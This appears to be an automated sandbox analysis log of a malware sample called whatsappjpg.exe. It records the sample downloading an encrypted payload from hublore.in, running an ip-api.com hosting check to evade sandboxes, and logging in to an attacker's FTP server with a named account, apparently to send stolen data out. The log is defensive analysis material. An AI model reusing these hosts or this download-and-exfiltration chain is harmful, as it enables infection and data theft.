                                                    Oct 31, 2024 10:36:20.222215891 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.222224951 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.222238064 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.222251892 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.222271919 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.222297907 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.223052979 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.223100901 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.223263025 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.223306894 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.321269989 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.321284056 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.321295977 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.321399927 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.321536064 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.321548939 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.321583033 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.321611881 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.321613073 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.321650028 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.321674109 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.321685076 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.321727991 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.360452890 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.360503912 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.360503912 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.360517979 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.360541105 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.360554934 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.360680103 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.360693932 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.360718966 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.360730886 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.360858917 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.360896111 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.360941887 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.360954046 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.360980988 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.360995054 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.361707926 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.361720085 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.361749887 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.361763000 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.381732941 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.381755114 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.381764889 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.381783962 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.381808043 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.440115929 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.440170050 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.440181971 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.440198898 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.440228939 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.440395117 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.440416098 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.440443993 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.440474033 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.440483093 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.440495968 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.440529108 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.440547943 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.440613031 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.440659046 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.479156017 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.479204893 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.479218006 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.479266882 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.479300022 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.479373932 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.479387999 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.479418993 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.479444027 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.479553938 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.479567051 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.479599953 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.479629040 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.479674101 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.479687929 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.479717970 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.479741096 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.480160952 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.480207920 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.480252028 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.480290890 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.500530958 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.500577927 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.500590086 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.500621080 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.500649929 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.559029102 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.559056044 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.559092999 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.559113979 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.559389114 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.559402943 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.559416056 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.559438944 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.559462070 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.559473991 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.559489965 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.559501886 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.559518099 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.559545994 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.598030090 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.598062038 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.598073006 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.598105907 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.598118067 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.598129988 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.598134041 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.598189116 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.598696947 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.598746061 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.598798037 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.598812103 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.598850965 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.598952055 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.598964930 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.599001884 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.631207943 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.631302118 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.631550074 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.631598949 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:21.970726013 CET4997580192.168.2.9208.95.112.1
                                                    Oct 31, 2024 10:36:21.975909948 CET8049975208.95.112.1192.168.2.9
                                                    Oct 31, 2024 10:36:21.975990057 CET4997580192.168.2.9208.95.112.1
                                                    Oct 31, 2024 10:36:21.977819920 CET4997580192.168.2.9208.95.112.1
                                                    Oct 31, 2024 10:36:21.982783079 CET8049975208.95.112.1192.168.2.9
                                                    Oct 31, 2024 10:36:22.577816010 CET8049975208.95.112.1192.168.2.9
                                                    Oct 31, 2024 10:36:22.632694960 CET4997580192.168.2.9208.95.112.1
                                                    Oct 31, 2024 10:36:23.853962898 CET4997621192.168.2.9203.161.184.34
                                                    Oct 31, 2024 10:36:23.859225035 CET2149976203.161.184.34192.168.2.9
                                                    Oct 31, 2024 10:36:23.859482050 CET4997621192.168.2.9203.161.184.34
                                                    Oct 31, 2024 10:36:24.762875080 CET2149976203.161.184.34192.168.2.9
                                                    Oct 31, 2024 10:36:24.763304949 CET4997621192.168.2.9203.161.184.34
                                                    Oct 31, 2024 10:36:24.768950939 CET2149976203.161.184.34192.168.2.9
                                                    Oct 31, 2024 10:36:25.100236893 CET2149976203.161.184.34192.168.2.9
                                                    Oct 31, 2024 10:36:25.100382090 CET4997621192.168.2.9203.161.184.34
                                                    Oct 31, 2024 10:36:25.105495930 CET2149976203.161.184.34192.168.2.9
                                                    Oct 31, 2024 10:36:25.477763891 CET2149976203.161.184.34192.168.2.9
                                                    Oct 31, 2024 10:36:25.477931976 CET4997621192.168.2.9203.161.184.34
                                                    Oct 31, 2024 10:36:25.482872009 CET2149976203.161.184.34192.168.2.9
                                                    Oct 31, 2024 10:36:25.813565016 CET2149976203.161.184.34192.168.2.9
                                                    Oct 31, 2024 10:36:25.813751936 CET4997621192.168.2.9203.161.184.34
                                                    Oct 31, 2024 10:36:25.818617105 CET2149976203.161.184.34192.168.2.9
                                                    Oct 31, 2024 10:36:26.149698019 CET2149976203.161.184.34192.168.2.9
                                                    Oct 31, 2024 10:36:26.155028105 CET4997621192.168.2.9203.161.184.34
                                                    Oct 31, 2024 10:36:26.160015106 CET2149976203.161.184.34192.168.2.9
                                                    Oct 31, 2024 10:36:26.490858078 CET2149976203.161.184.34192.168.2.9
                                                    Oct 31, 2024 10:36:26.491040945 CET4997621192.168.2.9203.161.184.34
                                                    Oct 31, 2024 10:36:26.495955944 CET2149976203.161.184.34192.168.2.9
                                                    Oct 31, 2024 10:36:26.827927113 CET2149976203.161.184.34192.168.2.9
                                                    Oct 31, 2024 10:36:26.828617096 CET4997750430192.168.2.9203.161.184.34
                                                    Oct 31, 2024 10:36:26.833733082 CET5043049977203.161.184.34192.168.2.9
                                                    Oct 31, 2024 10:36:26.833837032 CET4997750430192.168.2.9203.161.184.34
                                                    Oct 31, 2024 10:36:26.833873987 CET4997621192.168.2.9203.161.184.34
                                                    Oct 31, 2024 10:36:26.838860989 CET2149976203.161.184.34192.168.2.9
                                                    Oct 31, 2024 10:36:27.736864090 CET2149976203.161.184.34192.168.2.9
                                                    Oct 31, 2024 10:36:27.737298012 CET4997750430192.168.2.9203.161.184.34
                                                    Oct 31, 2024 10:36:27.737369061 CET4997750430192.168.2.9203.161.184.34
                                                    Oct 31, 2024 10:36:27.742419004 CET5043049977203.161.184.34192.168.2.9
                                                    Oct 31, 2024 10:36:27.742928028 CET5043049977203.161.184.34192.168.2.9
                                                    Oct 31, 2024 10:36:27.742986917 CET4997750430192.168.2.9203.161.184.34
                                                    Oct 31, 2024 10:36:27.788924932 CET4997621192.168.2.9203.161.184.34
                                                    Oct 31, 2024 10:36:28.075668097 CET2149976203.161.184.34192.168.2.9
                                                    Oct 31, 2024 10:36:28.116966963 CET4997621192.168.2.9203.161.184.34
                                                    Oct 31, 2024 10:36:29.285345078 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:29.285433054 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:37:04.302457094 CET8049975208.95.112.1192.168.2.9
                                                    Oct 31, 2024 10:37:04.302597046 CET4997580192.168.2.9208.95.112.1
                                                    Oct 31, 2024 10:37:13.820369005 CET4997580192.168.2.9208.95.112.1
                                                    Oct 31, 2024 10:37:13.825211048 CET8049975208.95.112.1192.168.2.9
                                                    Oct 31, 2024 10:38:07.698041916 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:38:08.070440054 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:38:08.773550987 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:38:09.976512909 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:38:12.382869005 CET4997480192.168.2.945.43.14.134
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Oct 31, 2024 10:36:17.743675947 CET6193453192.168.2.91.1.1.1
                                                    Oct 31, 2024 10:36:18.368067980 CET53619341.1.1.1192.168.2.9
                                                    Oct 31, 2024 10:36:21.956063032 CET4999553192.168.2.91.1.1.1
                                                    Oct 31, 2024 10:36:21.963215113 CET53499951.1.1.1192.168.2.9
                                                    Oct 31, 2024 10:36:23.814296961 CET5951953192.168.2.91.1.1.1
                                                    Oct 31, 2024 10:36:23.853085041 CET53595191.1.1.1192.168.2.9
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Oct 31, 2024 10:36:17.743675947 CET192.168.2.91.1.1.10x37b2Standard query (0)hublore.inA (IP address)IN (0x0001)false
                                                    Oct 31, 2024 10:36:21.956063032 CET192.168.2.91.1.1.10x1934Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                    Oct 31, 2024 10:36:23.814296961 CET192.168.2.91.1.1.10xe268Standard query (0)mail.hearing-vision.comA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Oct 31, 2024 10:33:57.706403971 CET1.1.1.1192.168.2.90xdc50No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                    Oct 31, 2024 10:33:57.706403971 CET1.1.1.1192.168.2.90xdc50No error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                    Oct 31, 2024 10:33:57.706403971 CET1.1.1.1192.168.2.90xdc50No error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                    Oct 31, 2024 10:36:18.368067980 CET1.1.1.1192.168.2.90x37b2No error (0)hublore.in45.43.14.134A (IP address)IN (0x0001)false
                                                    Oct 31, 2024 10:36:21.963215113 CET1.1.1.1192.168.2.90x1934No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                    Oct 31, 2024 10:36:23.853085041 CET1.1.1.1192.168.2.90xe268No error (0)mail.hearing-vision.com203.161.184.34A (IP address)IN (0x0001)false
                                                    • hublore.in
                                                    • ip-api.com
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.94997445.43.14.134801284C:\Users\user\Desktop\whatsappjpg.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 31, 2024 10:36:18.386198044 CET177OUTGET /disha/mDdzfEwyp125.bin HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: hublore.in
                                                    Cache-Control: no-cache
                                                    Oct 31, 2024 10:36:19.109726906 CET1236INHTTP/1.1 200 OK
                                                    Date: Thu, 31 Oct 2024 09:36:19 GMT
                                                    Server: Apache
                                                    Last-Modified: Thu, 31 Oct 2024 01:15:35 GMT
                                                    Accept-Ranges: bytes
                                                    Content-Length: 242240
                                                    Content-Type: application/octet-stream
                                                    Data Raw: 08 8e e4 8b 2b 7e d6 d0 80 02 8e 14 30 5b e0 28 87 a9 5f b7 9d 93 63 0a 4a 5b 3a cc 89 a3 36 37 0d f6 06 94 b2 4a 51 b2 a1 a8 28 2d e9 b3 4b 52 27 e0 8f 5d 01 64 ed 11 95 e7 e2 cb 2c ce 87 2a ea 48 b6 f5 28 81 cc 11 3c 50 3f f2 38 d0 3b b6 2b cf 5e 5b 53 a1 29 57 4f f0 ff 2f 18 8d bb 3c e3 7f e3 8d 5c a3 12 3c 5f cb 5c 4e cb fb 92 0d 22 94 73 77 fe 15 ce a3 ea 2b ee a1 bf 59 34 14 d9 6d 95 aa 84 22 b3 dc 6c 69 72 82 64 4a f8 74 d5 21 4a 22 eb 04 04 d9 80 9e 37 58 14 af 7a 79 63 73 e4 64 dd 06 5d 59 e3 b5 be 38 07 04 9e 8a 25 6b 48 5b 4e 96 06 72 60 68 4e 31 d7 08 22 56 26 1c 67 6c 60 30 30 88 1f d9 d8 18 5c 70 7a ac 09 24 15 bb a8 a9 6c 57 7f 24 52 ef 39 2e cf 5c 79 9b f7 f1 a2 30 ab 01 a4 b4 dc e5 13 03 5e 1d 00 4a fe 40 e7 9c f8 04 c9 7b 19 6e 93 0e 74 c1 a1 e4 6f ed d0 73 66 8c cf 2d d9 8a a5 0d c2 8b 8a b2 ab 46 2d 63 af 4d 5e 13 0e 61 f8 86 5f 8c 00 cc 81 61 5b c3 c5 b1 28 72 9d f6 9e a9 2c 4d 83 d3 19 76 5a 66 30 90 05 41 07 48 fe d6 57 6a 32 33 8f 0f c1 4d 56 78 78 e6 be be 4c 73 41 e3 a9 f2 [TRUNCATED]
                                                    Data Ascii: +~0[(_cJ[:67JQ(-KR']d,*H(<P?8;+^[S)WO/<\<_\N"sw+Y4m"lirdJt!J"7Xzycsd]Y8%kH[Nr`hN1"V&gl`00\pz$lW$R9.\y0^J@{ntosf-F-cM^a_a[(r,MvZf0AHWj23MVxxLsA3uLCV;#/L"_(v%{6KqxjjGEO#zABn"T\s)'g^6c=|wB^c>./PY)klG73-@ESLzV,hnT8EOW&h6G!>B z$cM(|Q2(?F0AC/8<_7g~Yl"tL:r<!FqdheCnyn]+!bocPA`9yqOF;\Ni3G:d?]NAq~,?E6xk},x.*-lnm$Bb(iW7S)0\yH|vK\_mT4Oaxw@[3=e+t:N^]U,6Bxf)h]>UMt(_JkGb"@5g?y*UAP#;==!f~5ws1h/dM@vg-\ .X%G$C4Aaf9><}P3^S8 [TRUNCATED]
                                                    Oct 31, 2024 10:36:19.109756947 CET1236INData Raw: 67 ef 71 bd d7 18 de 71 f1 29 05 37 71 3a 18 75 94 29 55 11 f8 17 58 35 e2 7b 8a 67 a7 1a 4b 29 02 47 77 ba d9 7c 62 62 b4 77 99 fc ca 4e 70 53 ec fc 73 78 d0 80 26 7c d7 29 ff 8d 6d 5c d8 23 7c f5 bf 61 3e 41 73 48 4a 4c ee b9 5f 67 43 90 be a8
                                                    Data Ascii: gqq)7q:u)UX5{gK)Gw|bbwNpSsx&|)m\#|a>AsHJL_gCk_$6b%zSCTH{!v^:c1A`ag04NZ~{>#263hpZYU@q7%wyn&gK"! *4fR
                                                    Oct 31, 2024 10:36:19.109771013 CET1236INData Raw: fa 08 14 cc b7 96 c0 30 f2 d9 eb 5b 27 35 fe 78 10 28 a3 33 d5 6a e1 d5 1d 7a f0 c1 ad cd 21 d7 41 07 fb 31 dc 37 df 38 67 97 da 8e 3d 27 59 1f 52 c0 c5 a3 73 96 90 94 f0 2c 36 ac 02 d9 2c f9 6d 2c 1c 84 33 66 f0 6f 0c 3d c2 b3 c4 50 e4 61 30 1b
                                                    Data Ascii: 0['5x(3jz!A178g='YRs,6,m,3fo=Pa0g6gt\lGtoR7>W((y]t'+%?1FQZ%{F'^0|`HQ@:dAcA$e&/WqiQjF|4}tqxBvmRl$]=
                                                    Oct 31, 2024 10:36:19.109786987 CET1236INData Raw: 93 a2 79 65 b0 64 48 8f d3 bb 31 5f ba 17 51 fc 1e 83 19 4f 91 09 2a e8 d2 93 f5 f3 f1 e8 9c 95 c8 d2 46 ff 8c 5e 7d 61 6f d4 06 19 07 f0 67 37 4f 2c 5d 2a db ef 03 5f 8f a9 53 e2 08 97 cf e7 e1 80 4c 42 15 08 3d fe f3 22 86 59 fb 4e b9 18 04 28
                                                    Data Ascii: yedH1_QO*F^}aog7O,]*_SLB="YN(VTjA2[4tT8<&7dVZJk%El[7ErX4Is*M<1e.?@RQa4Vv!ymTZ[,+J:q>Wj1HYwdZp)S(dS%Q.
                                                    Oct 31, 2024 10:36:19.109819889 CET1236INData Raw: 12 6e 2b 1a a1 8c 64 1d c7 92 13 5b 52 1c 8c 41 10 b7 e4 42 ad 35 b9 06 28 13 a7 ef 8c 31 99 1c 97 00 87 35 ba c1 af 6d c3 a1 b1 08 c9 3d 6b de 67 80 ab 1b b4 57 95 a1 e1 73 77 72 54 b4 7f aa 11 af e7 10 2e 8d 6a 2e d6 85 ca f6 28 b1 90 1f fc 8f
                                                    Data Ascii: n+d[RAB5(15m=kgWswrT.j.(OhJqx~uf^Q(Mt?pjD(skGb>g?]8'RNl&=NA>V}J7/s9r2VzZNA?Em7Aq
                                                    Oct 31, 2024 10:36:19.109833956 CET1236INData Raw: 9a 6b be 25 ed c6 9e bb e6 89 4e c2 11 21 6b a4 a5 87 4c 70 2e 32 87 5c 3c a8 85 08 d6 53 d7 d3 8d 98 2a 21 9d 9a e9 f5 b6 d0 49 51 e2 07 ba 20 41 de 54 2f 83 5d ce 57 ed 43 b9 86 23 1c 7b 27 8e f5 13 ab 40 bd 99 63 20 ed 87 5b 7a 6b 0c 7d bd aa
                                                    Data Ascii: k%N!kLp.2\<S*!IQ AT/]WC#{'@c [zk}J.G.>k+:re$7*^zyB+1g1D<k&tvV|^Y(`{aqH?_q3I/]xMt`Uq(^eCb5g?]X+,
                                                    Oct 31, 2024 10:36:19.110089064 CET1236INData Raw: 12 51 0a 0a 25 24 d7 65 33 3b cd 92 05 47 30 31 6b d3 2f 1b 32 f4 3c 5a ea 28 a7 65 07 d3 a2 58 d7 6f 22 65 6c f4 3a 1e 74 c2 db 17 d7 19 27 ec 71 dc 64 57 f3 ba a3 48 63 da 43 6e 87 14 87 76 f0 ab 87 a3 87 bd b8 0b 85 21 0c c4 df a9 81 6f 85 41
                                                    Data Ascii: Q%$e3;G01k/2<Z(eXo"el:t'qdWHcCnv!oACWA`whiEw2!kPWOP7\N_IXQNA S]wK+%?@.yZm}JQ.>m+:re$w[B6G;<\~={5kD?
                                                    Oct 31, 2024 10:36:19.110106945 CET1236INData Raw: ef 17 0a 50 8c ee 4f 5e 18 bd ae 54 91 e4 8e ef 64 3f d4 14 06 e4 40 9c 80 6f 53 e6 bc 4a 13 56 42 c2 c3 dd 69 ef a6 7f 74 38 d7 9e 45 f1 f2 25 cd b9 13 0a c1 0f 8c 01 0a e7 36 67 c0 21 f3 81 20 3f d4 e1 23 fe 94 9d f1 c6 89 9d bc 3e 86 cb dd b3
                                                    Data Ascii: PO^Td?@oSJVBit8E%6g! ?#>ccQ(e>FIA)<<^e~.XoxLt<dq@JCd4n]84!bocPA9y6dEN6_I[g@7"VV)f {S@J]F
                                                    Oct 31, 2024 10:36:19.110121012 CET248INData Raw: 4b 51 14 d9 78 a0 20 bd 66 6a df 10 4b 49 4f a9 dc 16 17 e2 6f 22 c0 ea ed f7 12 08 b9 b3 ef c2 b1 ea e0 1d f6 ce 41 c1 ae 17 4c 66 02 74 49 54 db 15 26 7d 8d 29 e5 5d ad d9 f7 98 43 02 26 8c 05 12 a8 99 54 60 c8 1b d2 39 7c eb 9d 97 bf 7d 4e d2
                                                    Data Ascii: KQx fjKIOo"ALftIT&})]C&T`9|}NB^c>\WkGq.xESzVhbTE$I;G!!'#9z4"lb3}2(?0AC.8;Z]krc"Tn:=!Fdhe
                                                    Oct 31, 2024 10:36:19.110131979 CET1236INData Raw: 40 62 fc ab a7 7e 8b bc b8 d5 80 18 02 c4 ad 62 94 91 fb e3 63 70 65 60 ea 39 87 f1 d1 b1 36 9a 66 8b 33 cd dc 9e 45 ea 77 4f 94 17 21 6b ae a5 85 4b 70 de 3d 87 5c 3e 7e bd 0f d6 59 01 e8 8a 98 00 85 97 9a e9 09 49 e7 5d 51 c2 1c 92 4e 41 20 5c
                                                    Data Ascii: @b~bcpe`96f3EwO!kKp=\>~YI]QNA \]0{C|2@g#yzYa}CJI.2*#re$7[-AiBe(Y1@~=Y=k&3wc|T'|":n.(Om2G$4y{f@Do]Dt
                                                    Oct 31, 2024 10:36:19.115099907 CET1236INData Raw: f3 81 fe 3f ed f2 23 00 9a e3 f9 c6 77 95 85 7a a7 c8 dd 93 64 9d e4 36 2d 15 cc f0 e9 79 94 12 51 0a 9d 26 24 d7 e4 69 3b cd e4 bf 1e 30 41 47 e2 2f 1b 38 cd 0c 58 f9 2e a2 65 7e d1 a2 58 c3 4f 22 74 4c f4 c4 10 74 3c ed 09 d6 21 46 ef 8f d0 64
                                                    Data Ascii: ?#wzd6-yQ&$i;0AG/8X.e~XO"tLt<!Fdhe$BWvn](!:bocPae9y/djCN2j[eP7\X% [Q/NAkr1WC2y'@,yzBa}CJ.c(>(l+pe$l[zrMA5G)*


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.949975208.95.112.1801284C:\Users\user\Desktop\whatsappjpg.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 31, 2024 10:36:21.977819920 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                    Host: ip-api.com
                                                    Connection: Keep-Alive
                                                    Oct 31, 2024 10:36:22.577816010 CET174INHTTP/1.1 200 OK
                                                    Date: Thu, 31 Oct 2024 09:36:21 GMT
                                                    Content-Type: text/plain; charset=utf-8
                                                    Content-Length: 5
                                                    Access-Control-Allow-Origin: *
                                                    X-Ttl: 60
                                                    X-Rl: 44
                                                    Data Raw: 74 72 75 65 0a
                                                    Data Ascii: true


                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                    Oct 31, 2024 10:36:24.762875080 CET2149976203.161.184.34192.168.2.9220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.
                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:36. Server port: 21.
                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:36. Server port: 21.220-This is a private system - No anonymous login
                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:36. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:36. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                    Oct 31, 2024 10:36:24.763304949 CET4997621192.168.2.9203.161.184.34USER code@hearing-vision.com
                                                    Oct 31, 2024 10:36:25.100236893 CET2149976203.161.184.34192.168.2.9331 User code@hearing-vision.com OK. Password required
